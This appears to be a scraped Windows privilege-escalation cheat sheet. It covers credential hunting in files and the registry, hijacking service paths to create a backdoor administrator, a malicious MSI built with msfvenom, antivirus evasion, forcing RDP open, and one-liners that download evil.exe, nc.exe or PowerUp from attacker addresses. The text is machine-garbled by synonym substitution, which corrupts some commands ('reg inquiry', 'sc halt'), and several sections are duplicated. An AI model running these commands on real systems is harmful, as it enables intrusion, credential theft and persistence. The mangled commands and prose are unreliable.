Information Gathering
+ What organisation are nosotros connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"+ Get the hostname as well as username (if available)
hostname echo %username%+ Learn nearly your environment
SET echo %PATH%+ List other users on the box
net users cyberspace user <username>+ Networking/Routing Info
ipconfig /all road impress arp -A+ Active Network Connections
netstat -ano+ Firewall Status (only on Win XP SP2 as well as above)
netsh firewall demonstrate dry soil netsh firewall demonstrate config netsh advfirewall firewall demonstrate dominion all+ Scheduled tasks
schtasks /query /fo LIST /v+ Check how Running processes link to started services
tasklist /SVC+ Windows services that are started:
net start+ Driver madness (3rd political party drivers may conduct keep holes)
DRIVERQUERY+ Check systeminfo output against exploit-suggester
https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt+ Run windows-privesc script
https://github.com/pentestmonkey/windows-privesc-check
WMIC
Windows Management Instrumentation Command Line
Windows XP requires admin
+ Use wmic_info.bat script for automation
Windows XP requires admin
+ Use wmic_info.bat script for automation
http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar+ System Info
wmic COMPUTERSYSTEM instruct TotalPhysicalMemory,caption wmic CPU Get /Format:List+ Check spell level
wmic qfe instruct Caption,Description,HotFixID,InstalledOn
- Look for privilege escalation exploits as well as expect upward their respective KB spell numbers. Such exploits include, but are non express to, KiTrap0D (KB979682), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11-080 (KB2592799)
- After enumerating the OS version as well as Service Pack you lot should discovery out which privilege escalation vulnerabilities could locomote present. Using the KB spell numbers you lot tin grep the installed patches to encounter if whatsoever are missing
- Search patches for given spell
wmic qfe instruct Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
Examples:
wmic qfe instruct Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979682"Windows Vista/2008 6.1.6000 x32,Windows Vista/2008 6.1.6001 x32,Windows vii 6.2.7600 x32,Windows 7/2008 R2 6.2.7600 x64. (no practiced exploit - unlikely Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass))
wmic qfe instruct Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802"
Stored Credentials
- Directories that comprise the configuration files (however improve banking enterprise fit the entire filesystem). These files either comprise clear-text passwords or inwards a Base64 encoded format.
C:\sysprep.inf C:\sysprep\sysprep.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml
- When the box is connected to a Domain:
- Look for Groups.xml inwards SYSVOL
GPO preferences tin locomote used to do local users on domain. So passwords mightiness locomote stored there. Any authenticated user volition conduct keep read access to this file. The passwords is encryptes amongst AES. But the static fundamental is published on the msdn website. Thus it tin locomote decrypted. - Search for other policy preference files that tin conduct keep the optional “cPassword” attribute set:
Services\Services.xml: Element-Specific Attributes ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element Printers\Printers.xml: SharedPrinter Element Drives\Drives.xml: Element-Specific Attributes DataSources\DataSources.xml: Element-Specific Attributes
- Automated Tools
- Metasploit Module
post/windows/gather/credentials/gpp post/windows/gather/enum_unattend
- Powersploit
https://github.com/PowerShellMafia/PowerSploit Get-GPPPassword Get-UnattendedInstallFile Get-Webconfig Get-ApplicationHost Get-SiteListPassword Get-CachedGPPPassword Get-RegistryAutoLogon
- Search filesystem:
- Search for specific keywords:
dir /s *pass* == *cred* == *vnc* == *.config*
- Search certainly file types for a keyword
findstr /si password *.xml *.ini *.txt
- Search for certainly files
dir /b /s unattend.xml dir /b /s web.config dir /b /s sysprep.inf dir /b /s sysprep.xml dir /b /s *pass* dir /b /s vnc.ini
- Grep the registry for keywords (e.g. “passwords”)
reg inquiry HKLM /f password /t REG_SZ /s reg inquiry HKCU /f password /t REG_SZ /s reg inquiry "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" reg inquiry "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" reg inquiry "HKCU\Software\SimonTatham\PuTTY\Sessions" reg inquiry HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
- Find writeable files
dir /a-r-d /s /b
- /a is to search for attributes. In this illustration r is read exclusively as well as d is directory. The minus signs negate those attributes. So we're looking for writable files only.
- /s way recurse subdirectories
- /b way bare format. Path as well as filename only.
Trusted Service Paths
- List all unquoted service paths (minus built-in Windows services) on our compromised machine:
wmic service instruct name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Suppose nosotros found:
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
If you lot expect at the registry entry for this service amongst Regedit you lot tin encounter the ImagePath value is:
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
To locomote secure it should locomote similar this:
“C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe”
When Windows attempts to run this service, it volition expect at the next paths inwards social club as well as volition run the outset EXE that it volition find:
C:\Program.exe C:\Program Files.exe C:\Program Files(x86)\Program Folder\A.exe ...
- Check permissions of folder path
icacls "C:\Program Files (x86)\Program Folder"
- If nosotros tin write inwards the path nosotros flora a backdoor amongst the same cite amongst the service as well as restart the service.
exploit/windows/local/trusted_service_path
Vulnerable Services
Search for services that conduct keep a binary path (binpath) holding which tin locomote modified yesteryear non-Admin users - inwards that illustration alter the binpath to execute a ascendency of your own.
Note: Windows XP shipped amongst several vulnerable built-in services.
Use accesschk from SysInternals to search for these vulnerable services.
Note: Windows XP shipped amongst several vulnerable built-in services.
Use accesschk from SysInternals to search for these vulnerable services.
https://technet.microsoft.com/en-us/sysinternals/bb842062.aspxFor Windows XP, version 5.2 of accesschk is needed:
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
accesschk.exe -uwcqv "Authenticated Users" * /accepteula accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula accesschk.exe -qdws Users C:\Windows\Then inquiry the service using Windows sc:
sc qc <vulnerable service name>Then alter the binpath to execute your ain commands (restart of the service volition most probable locomote needed):
sc config <vuln-service> binpath= "net user backdoor backdoor123 /add" sc halt <vuln-service> sc start <vuln-service> sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add" sc halt <vuln-service> sc start <vuln-service>Note - Might demand to purpose the depend attribute explicitly:
sc halt <vuln-service> sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= "" sc start <vuln-service>Metasploit module:
exploit/windows/local/service_permissions
AlwaysInstallElevated
AlwaysInstallElevated is a setting that allows non-privileged users the powerfulness to run Microsoft Windows Installer Package Files (MSI) amongst elevated (SYSTEM) permissions.
Check if these 2 registry values are develop to “1”:
Check if these 2 registry values are develop to “1”:
reg inquiry HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg inquiry HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedIf they are, do your ain malicious msi:
msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msiThen purpose msiexec on victim to execute your msi:
msiexec /quiet /qn /i C:\evil.msiMetasploit module:
exploit/windows/local/always_install_elevated
Bypassing AV
- Use Veil-Evasion
- Create your ain executable yesteryear “compiling” PowerShell scripts
- Use Metasploit to substitute custom EXE as well as MSI binaries. You tin develop EXE::Custom or MSI::Custom to betoken to your binary prior to executing the module.
Getting GUI
+ Using meterpreter, inject vnc session:
run post/windows/manage/payload_inject payload=windows/vncinject/reverse_tcp lhost=<yourip> options=viewonly=false+ Enable RDP:
netsh firewall develop service RemoteDesktop enable
reg add together "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add together "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
sc config TermService start= machine cyberspace start Termservice netsh.exe firewall add together portopening TCP 3389 "Remote Desktop"OR:
netsh.exe advfirewall firewall add together dominion name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound dominion for the Remote Desktop service to permit RDP traffic. [TCP 3389] added yesteryear LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=tcp
netsh.exe advfirewall firewall add together dominion name="Remote Desktop - User Mode (UDP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound dominion for the Remote Desktop service to permit RDP traffic. [UDP 3389] added yesteryear LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=udpOR (meterpreter)
run post/windows/manage/enable_rdphttps://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
Python exploits
Compiling Python Exploits for Windows on Linux
- install pyinstaller of windows amongst vino on Kali as well as and hence
wine /.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile 18176.py
- run `pyinstaller` located nether the same directory every bit Python scripts
wine /.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile HelloWorld.py
- Execute amongst wine
wine /.wine/drive_c/dist/HelloWorld.exe
File Transfers
bound commands on crunch to locomote non-interactive
https://blog.netspi.com/15-ways-to-download-a-file/
https://blog.netspi.com/15-ways-to-download-a-file/
TFTP
Windows XP as well as Win 2003 comprise tftp client. Windows vii do non yesteryear default
tfpt clients are normally non-interactive, hence they could locomote through an obtained crunch
tfpt clients are normally non-interactive, hence they could locomote through an obtained crunch
atftpd --daemon --port 69 /tftp
Windows> tftp -i 192.168.30.45 GET nc.exe
FTP
Windows comprise FTP customer but they are normally interactive
Solution: scripted parameters inwards ftp client: ftp -s
ftp-commands
Solution: scripted parameters inwards ftp client: ftp -s
ftp-commands
echo open 192.168.30.5 21> ftp.txt echo USER username password >> ftp.txt echo bin >> ftp.txt echo GET evil.exe >> ftp.txt echo good daytime >> ftp.txt ftp -s:ftp.txt
VBScript
wget-vbs script echo fob again, re-create glue the commands inwards the crunch
echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.102/evil.exe test.txt
Powershell
echo $storageDir = $pwd > wget.ps1 echo $webclient = New-Object System.Net.WebClient >>wget.ps1 echo $url = "http://10.11.0.102/powerup.ps1" >>wget.ps1 echo $file = "powerup.ps1" >>wget.ps1 echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Webdav
On kali linux install wsgidav as well as cheroot
pip install wsgidav cheroot
Start the wsgidav on a restricted folder: mkdir /tmp/webdav_folder wsgidav --host=0.0.0.0 --port=80 --root=/tmp/webdav_folderOn Windows mountain this folder using cyberspace use:
net purpose * http://YOUR_IP_ADDRESS/Reference: https://github.com/mar10/wsgidav
BitsAdmin
bitsadmin /transfer n http://domain/file c:%homepath%file
debug.exe
First purpose upx or similar to compress the executable:
upx -9 nc.exeThen purpose exe2bat to convert the executable into a serial of echo commands that are meant to locomote copied pasted inwards the remote system:
wine exe2bat.exe nc.exe nc.txtThen re-create glue each ascendency from nc.txt inwards the remote system. The commands volition gradually rebuild the executable inwards the target machine.
certuril
certutil.exe -URL volition fetch ANY file as well as download it here:
C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
Resources
https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
http://www.fuzzysecurity.com/tutorials/16.html
http://www.greyhathacker.net/?p=738
https://toshellandback.com/2015/11/24/ms-priv-esc/
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
https://www.toshellandback.com/2015/08/30/gpp/
https://www.toshellandback.com/2015/09/30/anti-virus/
https://www.veil-framework.com/framework/veil-evasion/
https://www.toshellandback.com/2015/11/24/ms-priv-esc/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-powersploit-part-1-evading-antivirus-software-0165535/
https://pentestlab.blog/2017/04/19/stored-credentials/
http://www.fuzzysecurity.com/tutorials/16.html
http://www.greyhathacker.net/?p=738
https://toshellandback.com/2015/11/24/ms-priv-esc/
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
https://www.toshellandback.com/2015/08/30/gpp/
https://www.toshellandback.com/2015/09/30/anti-virus/
https://www.veil-framework.com/framework/veil-evasion/
https://www.toshellandback.com/2015/11/24/ms-priv-esc/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-powersploit-part-1-evading-antivirus-software-0165535/
https://pentestlab.blog/2017/04/19/stored-credentials/